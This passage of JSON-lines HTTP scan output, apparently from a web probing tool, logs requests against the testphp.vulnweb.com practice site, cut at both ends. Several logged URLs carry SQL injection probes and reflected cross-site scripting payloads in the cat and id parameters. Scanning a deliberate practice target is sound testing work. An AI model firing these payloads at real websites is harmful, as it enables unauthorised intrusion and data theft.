tml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1A01\",\"time\":\"340.45489ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.039457645Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1Attack\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1Attack\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1Attack\",\"time\":\"353.080477ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4871,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.074734986Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1Current\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1Current\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1Current\",\"time\":\"351.982357ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4872,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.155006126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1Database\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1Database\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1Database\",\"time\":\"353.99597ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4873,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.21773745Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1^database\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1^database\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1^database\",\"time\":\"349.215305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.246977637Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1a\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1a\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1a\",\"time\":\"346.962966ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4866,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.354374738Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=2\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2\",\"time\":\"342.740598ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.407073834Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=2%20ORDER%20BY%2011\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=2%20ORDER%20BY%2011\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2%20ORDER%20BY%2011\",\"time\":\"352.190555ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.46844264Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=2%3E%3Cscript%3Ealert(%22Anmol%22)%3C/script%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=2%3E%3Cscript%3Ealert(%22Anmol%22)%3C/script%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2%3E%3Cscript%3Ealert(%22Anmol%22)%3C/script%3E\",\"time\":\"355.755009ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5007,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:56.56250456Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=3\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=3\",\"time\":\"349.623749ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:59.819254413Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=4\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=4\",\"time\":\"356.552616ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:59.941481087Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=5-4\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=5-4\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=5-4\",\"time\":\"354.278546ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:00.00304306Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=999999.9\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=999999.9\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=999999.9\",\"time\":\"345.339768ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:00.074034009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=FUZZ\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=FUZZ\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=FUZZ\",\"time\":\"340.14305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:00.440985182Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=FUZZ%22\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=FUZZ%22\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=FUZZ%22\",\"time\":\"348.625336ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:00.822353775Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=FUZZTotal\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=FUZZTotal\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=FUZZTotal\",\"time\":\"356.919267ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4873,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:00.907721659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=extractvalue\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=extractvalue\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=extractvalue\",\"time\":\"352.485078ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4876,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:01.090618727Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=extractvalue(r\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=extractvalue(r\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=extractvalue(r\",\"time\":\"353.199543ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:01.560337767Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=z\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=z\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=z\",\"time\":\"352.884671ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4865,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:01.691776061Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert(45)%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert(45)%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert(45)%3E\",\"time\":\"346.239741ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5016,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:03.357443002Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert(45)%3C%2Fscript%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert(45)%3C%2Fscript%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert(45)%3C%2Fscript%3E\",\"time\":\"352.234838ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5009,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:04.429279063Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z'%22%3E%3Csvg%2Fonload%3Dalert(45)%3Eto\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z'%22%3E%3Csvg%2Fonload%3Dalert(45)%3Eto\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=z?cat=z'%22%3E%3Csvg%2Fonload%3Dalert(45)%3Eto\",\"time\":\"345.113339ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5008,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:04.702685482Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?id=1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?id=1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?id=1\",\"time\":\"356.493217ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":491,\"lines\":105,\"status_code\":200,\"content_length\":4819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:04.992452938Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?id=1%27kOQjuk%3C%27%22%3EFcdVnA\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?id=1%27kOQjuk%3C%27%22%3EFcdVnA\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?id=1%27kOQjuk%3C%27%22%3EFcdVnA\",\"time\":\"343.191991ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":491,\"lines\":105,\"status_code\":200,\"content_length\":4819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:05.800960894Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?id=1%29%22%2C%28%27%2C%28%2C%29.\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?id=1%29%22%2C%28%27%2C%28%2C%29.\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?id=1%29%22%2C%28%27%2C%28%2C%29.\",\"time\":\"352.354908ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":491,\"lines\":105,\"status_code\":200,\"content_length\":4819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:05.877778476Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/lo\",\"input\":\"http://testphp.vulnweb.com/lo\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/lo\",\"time\":\"343.026648ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:05.876835135Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?id=5374\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?id=5374\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?id=5374\",\"time\":\"340.528134ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":491,\"lines\":105,\"status_code\":200,\"content_length\":4819,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:05.937894991Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/logi... \",\"input\":\"http://testphp.vulnweb.com/logi...%20\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logi...%20\",\"time\":\"350.318748ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:05.938658119Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/logi\",\"input\":\"http://testphp.vulnweb.com/logi\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logi\",\"time\":\"356.811065ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.321451373Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php \",\"input\":\"http://testphp.vulnweb.com/login.php%C2%A0\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php%C2%A0\",\"time\":\"343.403927ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.322955427Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php\",\"input\":\"http://testphp.vulnweb.com/login.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php\",\"time\":\"353.596371ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.394097111Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php';\",\"input\":\"http://testphp.vulnweb.com/login.php';\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php';\",\"time\":\"348.1392ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.433689369Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php6\",\"input\":\"http://testphp.vulnweb.com/login.php6\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php6\",\"time\":\"354.047989ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.501648182Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php6L\",\"input\":\"http://testphp.vulnweb.com/login.php6L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php6L\",\"time\":\"342.741458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.565115982Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php:8080\",\"input\":\"http://testphp.vulnweb.com/login.php:8080\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php:8080\",\"time\":\"342.870105ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.616938523Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1\",\"time\":\"349.668405ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.732133983Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1%20AND%208999%3D6241\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1%20AND%208999%3D6241\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php?id=1%20AND%208999%3D6241\",\"time\":\"358.603056ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:06.768920406Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/login.php?id=1%27%29%20AND%20%28SELECT%20NULLIFZERO%28hashcode%28NULL%29%29%29%20IS%20NULL%20AND%20%28%27KPgJ%27%3D%27KPgJ\",\"input\":\"http://testphp.vulnweb.com/login.php?id=1%27%29%20AND%20%28SELECT%20NULLIFZERO%28hashcode%28NULL%29%29%29%20IS%20NULL%20AND%20%28%27KPgJ%27%3D%27KPgJ\",\"title\":\"login 